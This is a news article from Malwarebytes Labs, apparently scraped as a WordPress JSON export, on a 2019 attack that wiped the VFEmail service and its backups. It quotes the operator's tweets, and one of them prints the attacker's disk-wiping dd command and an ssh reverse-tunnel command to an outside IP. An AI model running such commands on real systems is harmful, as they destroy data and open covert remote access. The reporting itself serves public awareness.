{"id":14597,"date":"2019-02-14T10:10:02","date_gmt":"2019-02-14T18:10:02","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2019\/02\/14\/news-8346\/"},"modified":"2019-02-14T10:10:02","modified_gmt":"2019-02-14T18:10:02","slug":"news-8346","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2019\/02\/14\/news-8346\/","title":{"rendered":"Hacker destroys VFEmail service, wipes backups"},"content":{"rendered":"

Credit to Author: Christopher Boyd| Date: Thu, 14 Feb 2019 16:56:00 +0000<\/strong><\/p>\n

An email service called VFEmail was essentially put out of business<\/a>\u00a0after a hack intended to delete everything in (and out of) sight.<\/p>\n

\n

“Yes, @VFEmail is effectively gone. It will likely not return. I never thought anyone would care about my labor of love so much that they\u2019d want to completely and thoroughly destroy it.”<\/em><\/p>\n<\/blockquote>\n

This wasn’t “just” a simple webpage compromise<\/a>, or some sort of database dump. In fact, it was something altogether quite worse. Put simply, the total annihilation of a service and most, if not all, of its infrastructure.<\/p>\n

What happened?<\/h3>\n

Users of VFEmail woke to the following message on the service’s website:<\/p>\n

\"VFEmail<\/a><\/p>\n

Click to enlarge<\/p>\n

\n

!!!ALERT!!!! Update Feb 11 2019<\/em><\/p>\n

vfemail(dot)net and mail(dot)vfemail(dot)net are currently unavailable.<\/em><\/p>\n

We have suffered catastrophic destruction at the hands of a hacker, last seen as aktv[redacted]<\/em><\/p>\n

This person has destroyed all data in the US, both primary and backup systems. We are working to recover what data we can.<\/em><\/p>\n

New updates 2\/11\/19 6pm CST:<\/em><\/p>\n

Incoming mail is now being delivered.<\/em><\/p>\n

Webmail is up. Note-mailboxes are created upon new mail delivery. If you cannot login, you may not have received mail.<\/em><\/p>\n

Mailboxes are new, no subfolders exist.<\/em><\/p>\n

No filters are in place. If you created a filter with Horde, Login to Horde, Create any folders you need.\u00a0<\/span><\/em><\/p>\n

Click Filter, Click Script, then click ‘Activate Script’.<\/em><\/p>\n

There is no spam scanning at this time – Incoming mail may be Spam scanned depending on DNS status.<\/em><\/p>\n

Free users should not attempt to send email, there is currently no delivery mechanism for free accounts. Paid accounts should be useable, including Horde\/Roundcube contacts and calendars.<\/em><\/p>\n

At this time I am unsure of the status of existing mail for US users. If you have your own email client, DO NOT TRY TO MAKE IT WORK.<\/em><\/p>\n

If you reconnect your client to your new mailbox, all your local mail will be lost.<\/em><\/p>\n<\/blockquote>\n

Ouch.<\/p>\n

Did they put word out on social media?<\/h3>\n

You bet they did, and the Tweets don\u2019t make for pleasant reading:<\/p>\n

\n

This is not looking good. All externally facing systems, of differing OS’s and remote authentication, in multiple data centers are down.<\/p>\n

\u2014 VFEmail.net (@VFEmail) 11 February 2019<\/a><\/p>\n<\/blockquote>\n

https:\/\/platform.twitter.com\/widgets.js<\/a><\/p>\n

\n

Caught the perp in the middle of formatting the backup server:
dd if=\/dev\/zero of=\/dev\/da0 bs=4194304 seek=1024 count=399559
via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=\/dev\/null aktv@94.155.49.9 -R 127.0.0.1:30081:127.0.0.1:22 -N<\/p>\n

\u2014 VFEmail.net (@VFEmail) 11 February 2019<\/a><\/p>\n<\/blockquote>\n

https:\/\/platform.twitter.com\/widgets.js<\/a><\/p>\n

It may sound a bit exciting to walk in on the scene of the crime, but I can assure you it’d only involve lots of “oh no” types of expression. If they’re already wiping your backups, the game is indeed over.<\/p>\n

Did they recover?<\/h3>\n

Sadly things didn’t improve, and a few hours later the full damage report was available:<\/p>\n

\n

At this time, the attacker has formatted all the disks on every server. Every VM is lost. Every file server is lost, every backup server is lost. NL was 100% hosted with a vastly smaller dataset. NL backups by the provider were intact, and service should be up there.<\/p>\n

\u2014 VFEmail.net (@VFEmail) 11 February 2019<\/a><\/p>\n<\/blockquote>\n

https:\/\/platform.twitter.com\/widgets.js<\/a>
All data was encrypted at least, but said data basically vanished into thin air when it was scrubbed:<\/p>\n

\n

Yep, but it doesn’t matter. They just formatted everything.<\/p>\n

\u2014 VFEmail.net (@VFEmail) 11 February 2019<\/a><\/p>\n<\/blockquote>\n

https:\/\/platform.twitter.com\/widgets.js<\/a>
They also managed to destroy various VMs using different forms of authentication.<\/p>\n

\n

Strangely, not all VMs shared the same authentication, but all were destroyed. This was more than a multi-password via ssh exploit, and there was no ransom. Just attack and destroy.<\/p>\n

\u2014 VFEmail.net (@VFEmail) 11 February 2019<\/a><\/p>\n<\/blockquote>\n

https:\/\/platform.twitter.com\/widgets.js<\/a><\/p>\n

“Just attack and destroy”<\/h3>\n

Services and sites have been attacked severely in the past, some to the point of destruction. However, there\u2019s almost always an overt reason given, or a ransom, or some other clue.<\/p>\n

Here, it\u2019s nothing but complete devastation and a service in existence since 2001 absolutely ruined in the bargain. There\u2019s no indication as to how they got in, or if an important system had no multi-factor authentication. A number of commentators have suggested this flaw<\/a> may have been a way in for the attacker.<\/p>\n

Until detailed analysis is published, it’s hard to say why this happened. Did the owner of the service aggravate a talented hacker? Or could one of the service users have drawn attention from unwanted sources, and this is the end result? It’ll be fascinating to find out. But if you operate a similar service, you may wish to consider a decent offline backup system in the meantime.<\/p>\n

The post Hacker destroys VFEmail service, wipes backups<\/a> appeared first on Malwarebytes Labs<\/a>.<\/p>\n

https:\/\/blog.malwarebytes.com\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"

Credit to Author: Christopher Boyd| Date: Thu, 14 Feb 2019 16:56:00 +0000<\/strong><\/p>\n\n\n\n
<\/a><\/td>\n<\/tr>\n
A hacker managed to compromise, and entirely destroy, a popular email service and all of its backups. What happened?<\/p>\n

Categories: <\/p>\n